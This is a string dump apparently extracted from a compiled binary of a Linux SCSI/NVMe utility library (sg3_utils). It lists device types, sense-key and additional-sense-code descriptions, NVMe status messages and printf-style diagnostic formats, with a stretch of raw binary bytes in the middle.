[0x3] Reserved [0x0] Binary ASCII UTF-8 Reserved [0x4] Reserved [0x5] Reserved [0x6] Reserved [0x7] Reserved [0x8] Reserved [0x9] Reserved [0xa] SCSI RDMA Protocol (SRP) Internet SCSI (iSCSI) USB Attached SCSI (UAS-2) SCSI over PCI Express (SOP) PCIe Oxc Oxd Oxe No specific protocol tape printer processor write once optical disk cd/dvd scanner optical memory device medium changer communications graphics [0xa] graphics [0xb] storage array controller enclosure services device bridge controller commands object based storage automation/driver interface security manager device host managed zoned block 0x15 0x16 0x17 0x18 0x19 0x1a 0x1b 0x1c 0x1d well known logical unit unknown or no device type Filemark detected Setmark detected End-of-data detected I/O process terminated Audio play operation paused Cleaning requested Erase operation in progress Locate operation in progress Rewind operation in progress Verify operation in progress Deferred microcode is pending No index/sector signal No seek complete Peripheral device write fault No write current Excessive write errors Depopulation in progress No reference position found Unreachable copy target Track following error Tracking servo failure Focus servo failure Spindle servo failure Head select fault Error log overflow Warning Warning - enclosure degraded Warning - power loss expected Write error Block not compressible Write error - recovery needed Write error - recovery failed Auxiliary memory write error Multiple write errors Defects in error window Third party device failure Invalid information unit Information unit too short Information unit too long Id CRC or ECC error Read retries exhausted Error too long to correct Multiple read errors L-EC uncorrectable error CIRC unrecovered error Data re-synchronization error Incomplete block read No gap found Miscorrected error De-compression CRC error Error reading UPC/EAN number Error reading ISRC number Auxiliary memory read error Write after sanitize required Recorded entity not found Record not found Filemark or setmark not found End-of-data not found Block sequence error Locate operation failure Random positioning error Mechanical positioning error Recovered data with retries Recovered data with CIRC Recovered data with L-EC Recovered data with linking Defect list error Defect list not available Defect list not found Primary defect list not found Grown defect list not found Partial defect list transfer Not a subsidiary logical unit Invalid element address Invalid address for write Unaligned write command Write boundary violation Attempt to read invalid data Read boundary violation Misaligned write command Attempt to access gap zone Invalid field in cdb CDB decryption error Security audit value frozen Security working key frozen Nonce not unique Nonce timestamp out of range Invalid xcdb Invalid fast format Logical unit not supported Parameter not supported Parameter value invalid Data decryption error Too many target descriptors Too many segment descriptors Unexpected inexact segment Inline data length exceeded Fast copy not possible Write protected Hardware write protected Associated write protect Persistent write protect Permanent write protect Conditional write protect Zone is read only Format-layer may have changed Power on occurred SCSI bus reset occurred Device internal reset I_T nexus loss occurred Parameters changed Mode parameters changed Log parameters changed Reservations preempted Reservations released Registrations preempted Priority changed Capacity data has changed Timestamp changed Too many windows specified Current program area is empty Persistent prevent conflict Previous busy status Previous task set full status Not reserved Zone is offline Stream not open Unwritten data in zone Zone is inactive Incompatible medium installed Cleaning cartridge installed Cleaning failure Cleaning request rejected Cleaning tape expired WORM medium - integrity check Medium not formatted Incompatible volume type Incompatible volume qualifier Cleaning volume expired Medium format corrupted Format command failed Sanitize command failed Depopulation failed Defect list update failure Tape length error Enclosure failure Enclosure services failure Ribbon, ink, or toner failure Rounded parameter Event status notification Esn - media class event Esn - device busy class event Depopulation interrupted Medium not present Medium not present - loadable Sequential positioning error Slew failure Paper jam Failed to sense top-of-form Reposition error Read past end of medium Read past beginning of medium Position past end of medium Medium source element empty End of medium reached Medium magazine removed Medium magazine inserted Medium magazine locked Medium magazine unlocked Read past end of user object Element disabled Element enabled Data transfer device removed Data transfer device inserted Logical unit failure Timeout on logical unit Logical unit failed self-test Microcode has been changed Changed operating definition Inquiry data has changed Component device attached Device identifier changed Redundancy group deleted Spare created or modified Spare deleted Volume set deleted Volume set deassigned Volume set reassigned Echo buffer overwritten Medium loadable iSCSI IP address added iSCSI IP address removed iSCSI IP address changed Zone transition to full Bind completed Bind redirected Subsidiary binding changed Message error Internal target failure Select or reselect failure Unsuccessful soft reset SCSI parity error Data phase CRC error detected Protocol service CRC error Phy test function in progress Invalid message error Command phase error Data phase error Too much write data Ack/nak timeout Nak received Data offset error Initiator response timeout Connection lost Data-in buffer error Data-out buffer error PCIe fabric error PCIe completion timeout PCIe completer abort PCIe poisoned tlp received PCIe ecrc check failed PCIe unsupported request PCIe acs violation PCIe tlp prefix blocked Overlapped commands attempted Write append error Write append position error Erase failure Cartridge fault Media load or eject failed Unload tape failure Medium removal prevented Volume identifier invalid Volume identifier missing Duplicate volume identifier Element status unknown System resource failure System buffer full Insufficient resources Auxiliary memory out of space Quota error Data currently unavailable Insufficient zone resources Generation does not exist Updated block read Log exception Threshold condition met Log counter at maximum Log list codes exhausted Rpl status change Spindles synchronized Spindles not synchronized Low power condition on Power state change to active Power state change to idle Power state change to standby Power state change to sleep Lamp failure Video acquisition error Unable to acquire video Out of focus Scan head positioning error Illegal mode for this track Invalid packet size Voltage fault Configuration failure Add logical unit failed Remove of logical unit failed Assign failure occurred Command rejected Explicit bind not allowed Logical unit not configured Data loss on logical unit Parity/data mismatch Informational, refer to log State change has occurred Redundancy level got better Redundancy level got worse Rebuild failure occurred Recalculate failure occurred Insufficient permission Drive-host pairing suspended Session fixation error RMZ extension is not allowed CD control error Power calibration area error Program memory area is full RMA/PMA is almost full RDZ is full Security error Unable to decrypt data Incorrect data encryption key Error decrypting data Encryption algorithm disabled Invalid SA usage Authentication failed Ram failure [0x%x] Data path failure [0x%x] No Sense Recovered Error Not Ready Medium Error Hardware Error Illegal Request Unit Attention Data Protect Blank Check Vendor specific(9) Copy Aborted Aborted Command Equal Volume Overflow Completed Good Check Condition Condition Met Intermediate (obsolete) Reservation Conflict Command terminated (obsolete) Task Set Full ACA Active Task Aborted      %s        Error in %s: byte %d  %s        Relative to start of %s, byte %d      Unit attention condition queue:
        %s        overflow flag is %d
  vendor specific ASC=%02x, ASCQ=%02x (hex)       ASC=%02x, vendor specific qualification ASCQ=%02x (hex) Command set specific opcode: 0x%x       %s: length of returned string (n) %d
   %s: where is sentinel for sg_lib_nvme_cmd_status_arr ??
        %s: where is sentinel for sg_lib_scsi_status_sense_arr ??
      Utility stopped/aborted by signal number: %d    , try &#039;-v&#039; option for more information  %sTransport Id short or not multiple of 4 [length=%d]:
 %s  [Unexpected TPID format: %d]
       %s  Parallel SCSI initiator SCSI address: 0x%x
 %s  relative port number (of corresponding target): 0x%x
       %s  SSA (transport id not defined):
    %s  RDMA initiator port identifier:
    world wide unique port id: %.*s
          [Unexpected TPID format: %d]
 %s  unknown protocol id=0x%x  TPID format=%d
   %s      &lt;&lt; expected binary code_set &gt;&gt;
 %s      &lt;&lt; expected locally assigned UUID, 16 bytes long &gt;&gt;
    %s      Locally assigned UUID:  %sdesignator desc too short: got length of %d want 4 or more
   %sdesignator too long: says it is %d bytes, but given %d bytes
 %s      vendor specific: %.*s
  %s      &lt;&lt; expect 8, 12 and 16 byte EUI, got %d &gt;&gt;
     %s      EUI-64 based %d byte identifier
        %s      &lt;&lt; expected binary code_set (1) &gt;&gt;
     %s      Identifier extension: 0x%lx
    %s      &lt;&lt; can only decode 8, 12 and 16 byte ids &gt;&gt;
    %s      IEEE Company_id: 0x%x
  %s      Vendor Specific Extension Identifier: 0x%lx
    %s      &lt;&lt; unexpected code set %d for NAA &gt;&gt;
   %s      &lt;&lt; unexpected NAA 2 identifier length: 0x%x &gt;&gt;
 %s      NAA 2, vendor specific identifier A: 0x%x
      %s      vendor specific identifier B: 0x%x
     %s      &lt;&lt; unexpected NAA 3 identifier length: 0x%x &gt;&gt;
 %s      NAA 3, Locally assigned:
       %s      &lt;&lt; unexpected NAA 5 identifier length: 0x%x &gt;&gt;
 %s      NAA 5, IEEE Company_id: 0x%x
   %s      Vendor Specific Identifier: 0x%lx
      %s      &lt;&lt; unexpected NAA 6 identifier length: 0x%x &gt;&gt;
 %s      NAA 6, IEEE Company_id: 0x%x
   %s      Vendor Specific Identifier Extension: 0x%lx
    %s      &lt;&lt; unexpected NAA [0x%x] &gt;&gt;
    %s      &lt;&lt; expected binary code_set, target port association, length 4 &gt;&gt;
      %s      Relative target port: 0x%x
     %s      Target port group: 0x%x
        %s      &lt;&lt; expected binary code_set, logical unit association, length 4 &gt;&gt;
     %s      Logical unit group: 0x%x
       %s      &lt;&lt; expected binary code_set, logical unit association &gt;&gt;
       %s      MD5 logical unit identifier:
   %s      &lt;&lt; expected UTF-8, use ASCII &gt;&gt;
        %s      &lt;&lt; expected UTF-8 code_set &gt;&gt;
   %s      &gt;&gt;&gt;&gt; Protocol specific port identifier expects protocol
%s          identifier to be valid and it is not
      %s      USB device address: 0x%x
       %s      USB interface number: 0x%x
     %s      PCIe routing ID, bus number: 0x%x
      %s          function number: 0x%x
      %s          [or device number: 0x%x, function number: 0x%x]
    %s      &gt;&gt;&gt;&gt; unexpected protocol identifier: %s
%s           with Protocol specific port identifier
    %s      reserved designator=0x%x
       %s  &gt;&gt; expected Sense key: Recovered Error ??
  %s  error=0x%x, status=0x%x, device=0x%x, count(7:0)=0x%x%c
    %s  extend=%d, log_index=0x%x, lba_high,mid,low(7:0)=0x%x,0x%x,0x%x%c
    Valid=0, Info fld=0x%x [%u]   %s  Field replaceable unit code: %d
    %s  Sense Key Specific: Error in %s: byte %d    %s  Progress indication: %d.%02d%%
     %s  Actual retry count: 0x%02x%02x
     Relative to start of %s, byte %d        %s  Unit attention condition queue:     %s  Sense_key: 0x%x unexpected
 %s fixed descriptor length too short, len=%d
   %ssense buffer too short (4 byte minimum)
      %sVendor specific sense buffer, in hex:
        Probably uninitialized data.
%s  Try to view as SCSI-1 non-extended sense:
       AdValid=%d  Error class=%d  Error code=%d
    %s Raw sense data (in hex), sb_len=%d   %s&lt;&lt;&lt;Sense data overflow (SDAT_OVFL)&gt;&gt;&gt;
        Descriptor format, &lt;&lt;&lt;deferred&gt;&gt;&gt;       Incorrect Length Indicator (ILI)        Incorrect Length Indicator (ILI) %s
    OSD response integrity check value
     extend=%d error=0x%x 
%s        count=0x%x      lba=0x%02x%02x%02x%02x%02x%02x  %s        [sense_key=0x%x asc,ascq=0x%x,0x%x]
  %s      truncated descriptor, stop
     %s    ILI (incorrect length indication) set
    %s    Field replaceable unit code: 0x%x
        %s    Usage reason: reserved[%d]
       unable to open binary file %s: %s
      read 0 bytes from binary file %s
       Unable to open %s for reading: %s
      %s: carry_over error [&#039;%s&#039;] around line %d
     %s: syntax error at line %d, pos %d
    %s: bad hex number in line %d, pos %d
  %s: hex number larger than 0xff in line %d, pos %d
     %s: error in line %d, at pos %d
        %s: posix_memalign: error [%d], out of memory?
 %s: bad args: start_bit=%d, num_bits=%d
        map ENXIO to SG_LIB_CAT_NOT_READY
          %s: %s requested %d bytes (data-%s  got %d bytes%s
     %s: %s can&#039;t get negative bytes, say it got none
       %s: %s can&#039;t send negative bytes, say it sent none
 %s: unknown %s result category (%d)
    mx_resp_len cannot exceed 255
      %s: got %d bytes in response, too short
    %s resid (%d) should never exceed requested len=%d
     combined header and data [or multiple modes]    download microcode and activate download microcode, save, and activate  download microcode with offsets and activate    download microcode with offsets, save, and activate     download microcode with offsets, select activation events, save and defer activate      download microcode with offsets, save and defer activate        enable expander comms protocol and echo buffer  disable expander comms protocol download application client error history       Receive copy operating parameters       Receive copy failure details(LID1)      register and ignore existing key        Notify data transfer device(16) Remove element and modify zones Add peripheral device / component device        Set automation device attribute Exchange peripheral device / component device   Remove peripheral device / component device     Break peripheral device / component device      Generate recommended access order       write dynamic runtime attribute Set automation device attributes        Maintenance out vendor specific Report assigned/unassigned p_extent     Report automation device attributes     Report component device attachments     Report peripheral device associations   Report identifying information  Report supported configuration method   Report supported operation codes        Report supported task management functions      Report provisioning initialization pattern      Receive recommended access order        Read dynamic runtime attribute  Maintenance in vendor specific  Object structure check (osd-2)  Perform task management function (osd-2)        Perform task management function (osd)  resend this and further commands to:    new subsiduary lu added to this administrative lu:      administrative lu associated with a preferred binding:  Command aborted due to power loss notication    Command aborted due to SQ deletion      Command aborted due to failed fused command     Command aborted due to missing fused command    Invalid SGL segment descriptor  Invalid number of SGL descriptors       Invalid use of controller memory buffer Host identifier inconsistent format     Command aborted due to Preempt and Abort        SGL data block granularity invalid      Command not supported for queue in CMB  Asynchronous event request limit exceeded       Firmware activation requires conventional reset Feature identifier not saveable Feature not namespace specific  Firmware activation requires NVM subsystem reset        Firmware activation requires reset      Firmware activation requires maximum time violation     Firmware activation prohibited  Namespace insufficient capacity Namespace identifier unavailable        Thin provisioning not supported Boot partition write prohibited Invalid secondary controller state      Invalid number of controller resources  Sanitize prohibited while PM enabled    Invalid protection information  Attempted write to read only range      End-to-end application tag check error  End-to-end reference tag check error    Deallocated or unwritten logical block  Initialize element status with range    Open/close import/export element        Request volume element address  command line options (usually)  type: sense key (plus blank check for tape)     type: sense key, apart from Invalid opcode      type: sense key; write protected media? Illegal request, Invalid opcode type: sense key, other than protection related (asc=0x10)       Illegal request with Info field Medium or hardware error with Info      type: probably additional sense code    command line options contradict or select bad mode      unexpected situation, contact author    Aborted command, protection error       Aborted command, protection error with Info field       flock (Unix system call) error  NVMe command with non-zero status       try &#039;-v&#039; option for more information    possible transport of driver issue      Too many segments in parameters Insufficient resources to create ROD    Insufficient resources to create ROD token      Commands cleared by device server       Invalid token operation, cause not reportable   Invalid token operation, unsupported token type Invalid token operation, remote token usage not supported       Invalid token operation, remote token creation not supported    Invalid token operation, token unknown  Invalid token operation, token corrupt  Invalid token operation, token revoked  Invalid token operation, token expired  Invalid token operation, token cancelled        Invalid token operation, token deleted  Invalid token operation, invalid token length   Utility found but did not have execute permissions      Utility to be executed was not found    Utility stopped/aborted by signal number: 0     Utility returned 255 or higher  Protocol specific port identifier       Target device that contains addressed lu        Fibre Channel Protocol for SCSI (FCP-5) SCSI Parallel Interface (SPI-5) Serial Storage Architecture SCSI-3 Protocol (SSA-S3P)   Serial Bus Protocol for IEEE 1394 (SBP-3)       Serial Attached SCSI Protocol (SPL-4)   Automation/Drive Interface Transport (ADT-2)    AT Attachment Interface (ACS-2) simplified direct access device optical card reader/writer device       No additional sense information End-of-partition/medium detected        Beginning-of-partition/medium detected  Programmable early warning detected     Audio play operation in progress        Audio play operation successfully completed     Audio play operation stopped due to error       No current audio status to return       Set capacity operation in progress      ATA pass through information available  Conflicting SA creation request Logical unit transitioning to another power condition   Extended copy information available     Atomic command aborted due to ACA       Logical unit not ready, cause not reportable    Logical unit is in process of becoming ready    Logical unit not ready, initializing command required   Logical unit not ready, manual intervention required    Logical unit not ready, format in progress      Logical unit not ready, rebuild in progress     Logical unit not ready, recalculation in progress       Logical unit not ready, operation in progress   Logical unit not ready, long write in progress  Logical unit not ready, self-test in progress   Logical unit not accessible, asymmetric access state transition Logical unit not accessible, target port in standby state       Logical unit not accessible, target port in unavailable state   Logical unit not ready, structure check required        Logical unit not ready, security session in progress    Logical unit not ready, auxiliary memory not accessible Logical unit not ready, notify (enable spinup) required Logical unit not ready, offline Logical unit not ready, SA creation in progress Logical unit not ready, space allocation in progress    Logical unit not ready, robotics disabled       Logical unit not ready, configuration required  Logical unit not ready, calibration required    Logical unit not ready, a door is open  Logical unit not ready, operating in sequential mode    Logical unit not ready, start stop unit command in progress     Logical unit not ready, sanitize in progress    Logical unit not ready, additional power use not yet granted    Logical unit not ready, configuration in progress       Logical unit not ready, microcode activation required   Logical unit not ready, microcode download required     Logical unit not ready, logical unit reset required     Logical unit not ready, hard reset required     Logical unit not ready, power cycle required    Logical unit not ready, affiliation required    Depopulation restoration in progress    Logical unit does not respond to selection      Multiple peripheral devices selected    Logical unit communication failure      Logical unit communication time-out     Logical unit communication parity error Logical unit communication CRC error (Ultra-DMA/32)     Vibration induced tracking error        Warning - specified temperature exceeded        Warning - background self-test failed   Warning - background pre-scan detected medium error     Warning - background medium scan detected medium error  Warning - non-volatile cache now volatile       Warning - degraded power to non-volatile cache  Warning - device statistics notification active Warning - high critical temperature limit exceeded      Warning - low critical temperature limit exceeded       Warning - high operating temperature limit exceeded     Warning - low operating temperature limit exceeded      Warning - high critical humidity limit exceeded Warning - low critical humidity limit exceeded  Warning - high operating humidity limit exceeded        Warning - low operating humidity limit exceeded Warning - microcode security at risk    Warning - microcode digital signature validation failure        Warning - physical element status change        Write error - recovered with auto reallocation  Write error - auto reallocation failed  Write error - recommend reassignment    Compression check miscompare error      Data expansion occurred during compression      Write error - loss of streaming Write error - padding blocks added      Write error - unexpected unsolicited data       Write error - not enough unsolicited data       Incomplete multiple atomic write operations     Write error - recovery scan needed      Write error - insufficient zone resources       Error detected by third party temporary initiator       Copy target device not reachable        Incorrect copy target device type       Copy target device data underrun        Copy target device data overrun Invalid field in command information unit       Logical block guard check failed        Logical block application tag check failed      Logical block reference tag check failed        Logical block protection error on recover buffered data Logical block protection method error   Unrecovered read error - auto reallocate failed Unrecovered read error - recommend reassignment Unrecovered read error - recommend rewrite the data     Cannot decompress using declared algorithm      Read error - loss of streaming  Read error - failed retransmission request      Read error - LBA marked bad by application client       Address mark not found for id field     Address mark not found for data field   Record not found - recommend reassignment       Record not found - data auto-reallocated        Positioning error detected by read of medium    Data synchronization mark error Data sync error - data rewritten        Data sync error - recommend rewrite     Data sync error - data auto-reallocated Data sync error - recommend reassignment        Recovered data with no error correction applied Recovered data with positive head offset        Recovered data with negative head offset        Recovered data with retries and/or circ applied Recovered data using previous sector id Recovered data without ECC - data auto-reallocated      Recovered data without ECC - recommend reassignment     Recovered data without ECC - recommend rewrite  Recovered data without ECC - data rewritten     Recovered data with error correction applied    Recovered data with error corr. &amp; retries applied       Recovered data - data auto-reallocated  Recovered data - recommend reassignment Recovered data - recommend rewrite      Recovered data with ECC - data rewritten        Defect list error in primary list       Defect list error in grown list Synchronous data transfer error Miscompare during verify operation      Miscompare verify of unmapped lba       Recovered id with ECC correction        Invalid command operation code  Access denied - initiator pending-enrolled      Access denied - no access rights        Access denied - invalid mgmt id key     Illegal command while in write capable state    Write type operation while in read capable state (obs)  Illegal command while in explicit address mode  Illegal command while in implicit address mode  Access denied - enrollment conflict     Access denied - invalid LU identifier   Access denied - invalid proxy token     Access denied - ACL LUN conflict        Illegal command when not in append-only mode    Not an administrative logical unit      Not a conglomerate logical unit Logical block address out of range      Invalid write crossing layer jump       Illegal function (use 20 00, 24 00, or 26 00)   invalid token operation, remote rod token creation not supported        Invalid cdb field while in explicit block model (obs)   Invalid cdb field while in implicit block model (obs)   Invalid field in parameter list Threshold parameters not supported      Invalid release of persistent reservation       Unsupported target descriptor type code Unsupported segment descriptor type code        Invalid operation for copy source or destination        Copy segment granularity violation      Invalid parameter while port is enabled Invalid data-out buffer integrity check value   Data decryption key fail limit reached  Incomplete key-associated data set      Vendor specific key reference not found Application tag mode page is invalid    Tape stream mirroring prevented Copy source or copy destination not authorized  Logical unit software write protected   Space allocation failed write protect   Not ready to ready change, medium may have changed      Import or export element accessed       Import/export element accessed, medium changed  Power on, reset, or bus device reset occurred   Bus device reset function occurred      Transceiver mode changed to single-ended        Transceiver mode changed to lvd Asymmetric access state changed Implicit asymmetric access state transition failed      Error recovery attributes have changed  Data encryption capabilities changed    Data encryption parameters changed by another i_t nexus Data encryption parameters changed by vendor specific event     Data encryption key instance counter has changed        Error history i_t nexus cleared Error history snapshot released SA creation capabilities data has changed       Medium removal prevention preempted     Zone reset write pointer recommended    Copy cannot execute since host cannot disconnect        Invalid combination of windows specified        Current program area is not empty       Illegal power condition request Previous reservation conflict status    Partition or collection contains user objects   ORWRITE generation does not match       Reset write pointer not allowed Descriptor format sense data required   Well known logical unit access required Overwrite error on update in place      Insufficient time for operation Command timeout before processing       Command timeout during processing       Command timeout during processing due to error recovery Commands cleared by another initiator   Commands cleared by power loss notification     Some commands cleared by queuing layer event    Cannot read medium - unknown format     Cannot read medium - incompatible format        Cannot write medium - unknown format    Cannot write medium - incompatible format       Cannot format medium - incompatible medium      Cannot write - application code mismatch        Current session not fixated for append  WORM medium - overwrite attempted       Zoned formatting failed due to spare linking    Depopulation restoration failed No defect spare location available      Unsupported enclosure function  Enclosure services unavailable  Enclosure services transfer failure     Enclosure services transfer refused     Enclosure services checksum error       Esn - power management class event      Thin provisioning soft threshold reached        Saving parameters not supported Medium not present - tray closed        Medium not present - tray open  Medium not present - medium auxiliary memory accessible Tape position error at beginning-of-medium      Tape position error at end-of-medium    Tape or electronic vertical forms unit not ready        Failed to sense bottom-of-form  Position past beginning of medium       Medium destination element full Medium magazine not accessible  Mechanical positioning or changer error Too many logical objects on partition to support operation      Element static information changed      Invalid bits in identify message        Logical unit has not self-configured yet        Logical unit unable to update self-test log     Target operating conditions have changed        Redundancy group created or modified    Volume set created or modified  Reported luns data has changed  Medium auxiliary memory accessible      Inspect referrals sense descriptors     Microcode has been changed without reset        Ram failure (should use 40 nn)  Data path failure (should use 40 nn)    Power-on or self-test failure (should use 40 nn)        Persistent reservation information lost ATA device failed Set Features  SCSI parity error detected during st data phase Information unit iuCRC error detected   Asynchronous information protection error detected      Some commands cleared by iSCSI protocol event   Initiator detected error message received       Invalid target port transfer tag received       Data-in buffer overflow - data buffer size      Data-in buffer overflow - data buffer descriptor area   Data-out buffer overflow - data buffer size     Data-out buffer overflow - data buffer descriptor area  Logical unit failed self-configuration  Position error related to timing        Erase failure - incomplete erase operation detected     Medium removal prevented by data transfer element       Medium thread or unthread failure       Data transfer device error - load failed        Data transfer device error - unload failed      Data transfer device error - unload missing     Data transfer device error - eject failed       Data transfer device error - library communication failed       SCSI to host system interface failure   Insufficient reservation resources      Insufficient registration resources     Insufficient access control resources   Maximum number of supplemental decryption keys exceeded Medium auxiliary memory not accessible  Insufficient power for operation        Insufficient resources to create rod    Insufficient resources to create rod token      Insufficient zone resources to complete write   Maximum number of streams open  Insufficient resources to bind  Unable to recover table-of-contents     Operator request or state change input  Operator medium removal request Operator selected write protect Operator selected write permit  Failure prediction threshold exceeded   Media failure prediction threshold exceeded     Logical unit failure prediction threshold exceeded      spare area exhaustion prediction threshold exceeded     Hardware impending failure general hard drive failure   Hardware impending failure drive error rate too high    Hardware impending failure data error rate too high     Hardware impending failure seek error rate too high     Hardware impending failure too many block reassigns     Hardware impending failure access times too high        Hardware impending failure start unit times too high    Hardware impending failure channel parametrics  Hardware impending failure controller detected  Hardware impending failure throughput performance       Hardware impending failure seek time performance        Hardware impending failure spin-up retry count  Hardware impending failure drive calibration retry count        Hardware impending failure power loss protection circuit        Controller impending failure general hard drive failure Controller impending failure drive error rate too high  Controller impending failure data error rate too high   Controller impending failure seek error rate too high   Controller impending failure too many block reassigns   Controller impending failure access times too high      Controller impending failure start unit times too high  Controller impending failure channel parametrics        Controller impending failure controller detected        Controller impending failure throughput performance     Controller impending failure seek time performance      Controller impending failure spin-up retry count        Controller impending failure drive calibration retry count      Data channel impending failure general hard drive failure       Data channel impending failure drive error rate too high        Data channel impending failure data error rate too high Data channel impending failure seek error rate too high Data channel impending failure too many block reassigns Data channel impending failure access times too high    Data channel impending failure start unit times too high        Data channel impending failure channel parametrics      Data channel impending failure controller detected      Data channel impending failure throughput performance   Data channel impending failure seek time performance    Data channel impending failure spin-up retry count      Data channel impending failure drive calibration retry count    Servo impending failure general hard drive failure      Servo impending failure drive error rate too high       Servo impending failure data error rate too high        Servo impending failure seek error rate too high        Servo impending failure too many block reassigns        Servo impending failure access times too high   Servo impending failure start unit times too high       Servo impending failure channel parametrics     Servo impending failure controller detected     Servo impending failure throughput performance  Servo impending failure seek time performance   Servo impending failure spin-up retry count     Servo impending failure drive calibration retry count   Spindle impending failure general hard drive failure    Spindle impending failure drive error rate too high     Spindle impending failure data error rate too high      Spindle impending failure seek error rate too high      Spindle impending failure too many block reassigns      Spindle impending failure access times too high Spindle impending failure start unit times too high     Spindle impending failure channel parametrics   Spindle impending failure controller detected   Spindle impending failure throughput performance        Spindle impending failure seek time performance Spindle impending failure spin-up retry count   Spindle impending failure drive calibration retry count Firmware impending failure general hard drive failure   Firmware impending failure drive error rate too high    Firmware impending failure data error rate too high     Firmware impending failure seek error rate too high     Firmware impending failure too many block reassigns     Firmware impending failure access times too high        Firmware impending failure start unit times too high    Firmware impending failure channel parametrics  Firmware impending failure controller detected  Firmware impending failure throughput performance       Firmware impending failure seek time performance        Firmware impending failure spin-up retry count  Firmware impending failure drive calibration retry count        Media impending failure endurance limit met     Failure prediction threshold exceeded (false)   Idle condition activated by timer       Standby condition activated by timer    Idle condition activated by command     Standby condition activated by command  Idle_b condition activated by timer     Idle_b condition activated by command   Idle_c condition activated by timer     Idle_c condition activated by command   Standby_y condition activated by timer  Standby_y condition activated by command        Power state change to device control    End of user area encountered on this track      Packet does not fit in available space  Automatic document feeder cover up      Automatic document feeder lift up       Document jam in automatic document feeder       Document miss feed automatic in document feeder Configuration of incapable logical units failed Modification of logical unit failed     Exchange of logical unit failed Attachment of logical unit failed       Creation of logical unit failed Multiply assigned logical unit  Set target port groups command failed   ATA device feature not enabled  Subsidiary logical unit not configured  Multiple logical unit failures  Command to logical unit failed  Copy protection key exchange failure - authentication failure   Copy protection key exchange failure - key not present  Copy protection key exchange failure - key not established      Read of scrambled sector without authentication Media region code is mismatched to logical unit region  Drive region must be permanent/region reset count error Insufficient block count for binding nonce recording    Conflict in binding nonce recording     Invalid drive-host pairing server       Decompression exception long algorithm id       Session fixation error writing lead-in  Session fixation error writing lead-out Session fixation error - incomplete track in session    Empty or partially written reserved track       No more track reservations allowed      No more test zone extensions are allowed        Power calibration area almost full      Power calibration area is full  Program memory area update failure      Current power calibration area almost full      Current power calibration area is full  Unencrypted data encountered while decrypting   Cryptographic integrity validation failed       Unknown signature verification key      Encryption parameters not useable       Digital signature validation failure    Encryption mode mismatch on read        Encrypted block not raw read enabled    Incorrect Encryption parameters Unable to decrypt parameter list        SA creation parameter value invalid     SA creation parameter value rejected    Data encryption configuration prevented SA creation parameter not supported     External data encryption key manager access error       External data encryption key manager error      External data encryption key not found  External data encryption request not authorized External data encryption control timeout        External data encryption control error  Logical unit access not authorized      Security conflict in translated device  Diagnostic failure on component [0x%x]  Power-on or self-test failure [0x%x]    Tagged overlapped commands [0x%x]       Decompression exception short algorithm id of 0x%x      Intermediate-Condition Met (obsolete)   ����P�������P���P���P���� ��� ��� ���@���ש��T�������t�������4���&lt;��������������������������������.���ܫ������.���.�������`��������P�����0�����������p�� ��������������������h�����@��x�������H����������
���
�����}���Z�Z�Z�������������H������h���H�������P���`�����@�x�H������ ������������������������������������`���X�����������������������������������������������������������������������@�����������J����������������������������������������������H������� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �� �������� �� �� ��m�� �� �� ��$�� ����� �� �� �� �� �� �� �� �� �����`�����h��h��h��h��h��h��h��h��h��h��h��h��h��h��h��h��h��h��h��h��h��h�� �����h��h��h�����h��h��h��q��h��0��h��h��h��h��h��h��h��h��h���������	��������������������������������������������������������������������p	��H�����*������	������������
�����n
��������+
������������
��������`	��(	�����0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��0��������0��M
��0�����0��0��0���	��0���	��0��0��&gt;	��0��0��0��
��0��0�����p����x��x��x��x��x��x��x��x��x��x��x��x��x��x��x��x��x��x��x��x��x��x�� �����x���	��x��H��x��x��x��	��x�����x��x�����x��x��x��P	��x��x�����������X�����������    sg_simple_inquiry_pt            sg_simple_inquiry               sg_ll_inquiry_com               sg_set_big_endian       sg_memalign     sg_f2hex_arr            sg_nvme_status2scsi             sg_get_nvme_cmd_status_str      sg_get_sfs_str     
   
                    0123456789abcdef                calculated response length too small, offset=%d calc_len=%d bd_len=%d
  given MS(%d) response length (%d) too short
    Host_status=0x%02x is invalid
  found no bsg not nvme char device in %s
        &gt;&gt;&gt;&gt;&gt;&gt;&gt; Warning: %s called with NULL pointer
   %s: unknown enclosure_override value: %d
       %s: fstat() failed: %s (errno=%d)
      %s: ioctl(NVME_IOCTL_ID) failed: %s (errno=%d)
 %s: invalid file descriptor (%d)
       undetermined device, could be regular file
     %s: dev_fd=%d, device_name: %s
 %s: open(%s, 0x%x) failed: %s
  %s: ioctl(SG_GET_VERSION_NUM) failed: errno: %d [%s]
   %s: sg driver version %d.%02d.%02d so choose v4
        %s: sg driver version %d.%02d.%02d so choose v3
        %s: unable to override milli --&gt; nanoseconds: %s
       %s: dev_fd=%d, succeeding in setting durations to nanoseconds
  %s: dev_fd=%d, ignored SG3_UTILS_LINUX_NANO
because base version sg version 4 driver
   No SCSI command (cdb) given [v3]
       ioctl(SG_IO v3) failed: %s (errno=%d)
  No SCSI command (cdb) given [v4]
       ioctl(SG_IO v4) failed: %s (errno=%d)
  %s: calloc() failed, out of memory?
    %s: max_response_len=%d too short, want 14 or more
     %s:  [sense_key,asc,ascq]: [0x5,0x%x,0x0] %c byte=%d, bit=%d
   %s:  [sense_key,asc,ascq]: [0x%x,0x%x,0x%x]
    %s: sense_len=%d too short, want 14 or more
    %s: [status, sense_key,asc,ascq]: [0x%x, 0x%x,0x%x,0x%x]
       
Data-out buffer (first 512 of %u bytes):
      %s: ioctl for %s [0x%x] failed: %s (errno=%d)
  %s: ioctl for %s [0x%x] failed, status: %s [0x%x]
      
Data-in buffer (first 1024 of %u bytes):
      %s: feature_id=0x%x, select=%d
 %s: warning, uses submit queue 0
       %s: no NVMe file descriptor given
      %s: file descriptor is not NVMe device
 %s: no NVMe 64 byte command present
    %s: sg_memalign() failed to get memory
 No NVMe command given (set_scsi_pt_cdb())
      %s: file descriptor given to create() and here differ
  %s: opcode=0x%x, fd=%d (dev_fd=%d), time_secs=%d
       %s: bad select_report value: 0x%x
      %s: calloc() failed to get memory
      %s: nblks_t10 is 0, a NOP in SCSI, can&#039;t map to NVMe
   %s: immed=%d, time_secs=%d, ignore
     %s: pf=%d, self_test=%d (st_code=%d)
   %s: bad self-test code [0x%x]
  %s: PF bit set bit param_list_len=0
    %s: param_list_len&gt;0 but PF clear
      %s: dout length (%u bytes) too short
   %s: dout [0x%lx] not page aligned
      %s: passing through d_pg=0x%x, len=%u to NVME_MI SES send
      %s: dpg_cd=0x%x, pcv=%d, alloc_len=0x%x
